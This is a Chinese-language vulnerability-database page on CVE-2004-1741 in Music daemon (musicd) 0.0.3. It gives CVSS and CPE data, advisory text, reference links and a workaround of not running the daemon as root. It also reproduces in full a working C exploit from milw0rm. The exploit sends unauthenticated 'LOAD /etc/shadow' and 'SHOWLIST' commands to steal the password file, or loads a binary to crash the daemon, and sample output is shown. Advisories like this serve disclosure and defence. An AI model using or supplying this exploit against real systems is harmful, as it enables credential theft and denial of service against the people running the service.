CVE-2004-1741
CVSS5.0
发布时间 :2004-08-23 00:00:00
修订时间 :2016-10-17 23:00:17
NMCOES    

[原文]Music daemon (musicd) 0.0.3 and earlier allows remote attackers to cause a denial of service (crash) by calling LOAD with a binary file as an argument, then calling SHOWLIST.


[CNNVD]Music Daemon LOAD命令文件公开漏洞(CNNVD-200408-211)

        Music daemon (musicd) 0.0.3及其早期版本存在漏洞。远程攻击者通过调用二进制文件作为参数的LOAD,然后调用SHOWLIST导致服务拒绝(崩溃)。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:music_daemon:music_daemon:0.1
cpe:/a:music_daemon:music_daemon:0.3
cpe:/a:music_daemon:music_daemon:0.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1741
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1741
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200408-211
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=109329098806595&w=2
(UNKNOWN)  BUGTRAQ  20040823 MusicDaemon <= 0.0.3 /etc/shadow Stealer / DoS Exploit
http://musicdaemon.sourceforge.net/
(PATCH)  CONFIRM  http://musicdaemon.sourceforge.net/
http://securitytracker.com/id?1011025
(UNKNOWN)  SECTRACK  1011025
http://www.securityfocus.com/bid/11006
(VENDOR_ADVISORY)  BID  11006
http://xforce.iss.net/xforce/xfdb/17068
(VENDOR_ADVISORY)  XF  musicd-load-showlist-dos(17068)

- 漏洞信息

Music Daemon LOAD命令文件公开漏洞
中危 访问验证错误
2004-08-23 00:00:00 2005-10-20 00:00:00
远程  
        Music daemon (musicd) 0.0.3及其早期版本存在漏洞。远程攻击者通过调用二进制文件作为参数的LOAD,然后调用SHOWLIST导致服务拒绝(崩溃)。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (413)

MusicDaemon <= 0.0.3 v2 Remote DoS and /etc/shadow Stealer (EDBID:413)
linux remote
2004-08-24 Verified
0 Tal0n
N/A [点击下载]
/* MusicDaemon <= 0.0.3 v2 Remote /etc/shadow Stealer / DoS 
* Vulnerability discovered by: Tal0n 05-22-04 
* Exploit code by: Tal0n 05-22-04 
* 
* Greets to: atomix, vile, ttl, foxtrot, uberuser, d4rkgr3y, blinded, wsxz, 
* serinth, phreaked, h3x4gr4m, xaxisx, hex, phawnky, brotroxer, xires, 
* bsdaemon, r4t, mal0, drug5t0r3, skilar, lostbyte, peanuter, and over_g 
* 
* MusicDaemon MUST be running as root, which it does by default anyways. 
* Tested on Slackware 9 and Redhat 9, but should work generically since the 
* nature of this vulnerability doesn't require 
* shellcode or return addresses. 
* 
* 
* Client Side View: 
* 
* root@vortex:~/test# ./md-xplv2 127.0.0.1 1234 shadow 
* 
* MusicDaemon <= 0.0.3 Remote /etc/shadow Stealer 
* 
* Connected to 127.0.0.1:1234... 
* Sending exploit data... 
* 
* <*** /etc/shadow file from 127.0.0.1 ***> 
* 
* Hello 
* <snipped for privacy> 
* ...... 
* bin:*:9797:0::::: 
* ftp:*:9797:0::::: 
* sshd:*:9797:0::::: 
* ...... 
* </snipped for privacy> 
* 
* <*** End /etc/shadow file ***> 
* 
* root@vortex:~/test# 
* 
* Server Side View: 
* 
* root@vortex:~/test/musicdaemon-0.0.3/src# ./musicd -c ../musicd.conf -p  1234 
* Using configuration: ../musicd.conf 
* [Mon May 17 05:26:07 2004] cmd_set() called 
* Binding to port 5555. 
* [Mon May 17 05:26:07 2004] Message for nobody: VALUE: LISTEN-PORT=5555 
* [Mon May 17 05:26:07 2004] cmd_modulescandir() called 
* [Mon May 17 05:26:07 2004] cmd_modulescandir() called Binding to port 1234. 
* [Mon May 17 05:26:11 2004] New connection! 
* [Mon May 17 05:26:11 2004] cmd_load() called 
* [Mon May 17 05:26:13 2004] cmd_show() called 
* [Mon May 17 05:26:20 2004] Client lost. 
* 
* 
* As you can see, it simply makes a connection, sends the commands, and 
* leaves. MusicDaemon doesn't even log that new connection's IPs that I 
* know of. Works very well, eh? :) 
* 
* The vulnerability is in where the is no authenciation for 1. For 2, it 
* will let you "LOAD" any file on the box if you have the correct privledges, 
* and by default, as I said before, it runs as root, unless you change the 
* configuration file to make it run as a different user. 
* 
* After we "LOAD" the /etc/shadow file, we do a "SHOWLIST" so we can grab 
* the contents of the actual file. You can subtitute any file you want in 
* for /etc/shadow, I just coded it to grab it because it being such an 
* important system file if you know what I mean ;). 
* 
* As for the DoS, if you "LOAD" any binary on the system, then use "SHOWLIST", 
* it will crash music daemon. 
* 
* 
*/ 
  
  
#include <stdio.h> 
#include <stdlib.h> 
#include <sys/types.h> 
#include <sys/socket.h> 
#include <netinet/in.h> 
  
int main(int argc, char *argv[]) { 
  
char buffer[16384]; 
  
char *xpldata1 = "LOAD /etc/shadow\r\n"; 
char *xpldata2 = "SHOWLIST\r\n"; 
char *xpldata3 = "CLEAR\r\n"; 
char *dosdata1 = "LOAD /bin/cat\r\n"; 
char *dosdata2 = "SHOWLIST\r\n"; 
char *dosdata3 = "CLEAR\r\n"; 
  
int len1 = strlen(xpldata1); 
int len2 = strlen(xpldata2); 
int len3 = strlen(xpldata3); 
int len4 = strlen(dosdata1); 
int len5 = strlen(dosdata2); 
int len6 = strlen(dosdata3); 
  
if(argc !=  4) { 
printf("\nMusicDaemon <= 0.0.3 Remote /etc/shadow 
Stealer / DoS"); 
printf("\nDiscovered and Coded by: Tal0n 
05-22-04\n"); 
printf("\nUsage: %s <host> <port> <option>\n", 
argv[0]); 
printf("\nOptions:"); 
printf("\n\t\tshadow - Steal /etc/shadow file"); 
printf("\n\t\tdos - DoS Music Daemon\n\n"); 
return 0; } 
  
printf("\nMusicDaemon <= 0.0.3 Remote /etc/shadow 
Stealer / DoS\n\n"); 
  
int sock; 
struct sockaddr_in remote; 
  
remote.sin_family = AF_INET; 
remote.sin_port = htons(atoi(argv[2])); 
remote.sin_addr.s_addr = inet_addr(argv[1]); 
  
if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) { 
printf("\nError: Can't create socket!\n\n"); 
return -1; } 
  
if(connect(sock,(struct sockaddr *)&remote, 
sizeof(struct sockaddr)) < 0) { 
printf("\nError: Can't connect to %s:%s!\n\n", 
argv[1], argv[2]); 
return -1; } 
  
printf("Connected to %s:%s...\n", argv[1], argv[2]); 
  
if(strcmp(argv[3], "dos") == 0) { 
  
printf("Sending DoS data...\n"); 
  
send(sock, dosdata1, len4, 0); 
  
sleep(2); 
  
send(sock, dosdata2, len5, 0); 
  
sleep(2); 
  
send(sock, dosdata3, len6, 0); 
  
printf("\nTarget %s DoS'd!\n\n", argv[1]); 
  
return 0; } 
  
if(strcmp(argv[3], "shadow") == 0) { 
  
printf("Sending exploit data...\n"); 
  
send(sock, xpldata1, len1, 0); 
  
sleep(2); 
  
send(sock, xpldata2, len2, 0); 
  
sleep(5); 
  
printf("Done! Grabbing /etc/shadow...\n"); 
  
memset(buffer, 0, sizeof(buffer)); 
read(sock, buffer, sizeof(buffer)); 
  
sleep(2); 
  
printf("\n<*** /etc/shadow file from %s ***>\n\n", 
argv[1]); 
printf("%s", buffer); 
printf("\n<*** End /etc/shadow file ***>\n\n"); 
  
send(sock, xpldata3, len3, 0); 
  
sleep(1); 
  
close(sock); 
  
return 0; } 
  
return 0; } 

// milw0rm.com [2004-08-24]
		

- 漏洞信息

9114
Musicdaemon musicd Multiple Command Remote DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

Music daemon 'musicd' contains a flaw that may allow a remote denial of service. The issue is triggered when a malicious user sends a LOAD command followed by a specially crafted SHOWLIST command to the server which crashes the daemon, and will result in loss of availability for the server.

- 时间线

2004-08-23 Unknow
2004-08-23 Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: do not run musicd under root privileges and do not allow access to the service from untrusted machines

- 相关参考

- 漏洞作者

- 漏洞信息

Music Daemon LOAD Command File Disclosure Vulnerability
Access Validation Error 11006
Yes No
2004-08-23 12:00:00 2009-07-12 06:17:00
Discovery of this vulnerability is credited to Tal0n <cyber_talon@hotmail.com>.

- 受影响的程序版本

Music daemon Music daemon 0.3
Music daemon Music daemon 0.2
Music daemon Music daemon 0.1

- 漏洞讨论

Music daemon is reported prone to a remote file disclosure vulnerability. The vulnerability presents itself due to a lack of sufficient sanitization performed on Music daemon command arguments.

A remote attacker may exploit this vulnerability in order to disclose the contents of files with the privilege of the Music daemon (musicd) process.

It is reported that if a binary file is specified as an argument for the affected command the attacker may cause the affected daemon to crash.

- 漏洞利用

The following exploit is available:

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站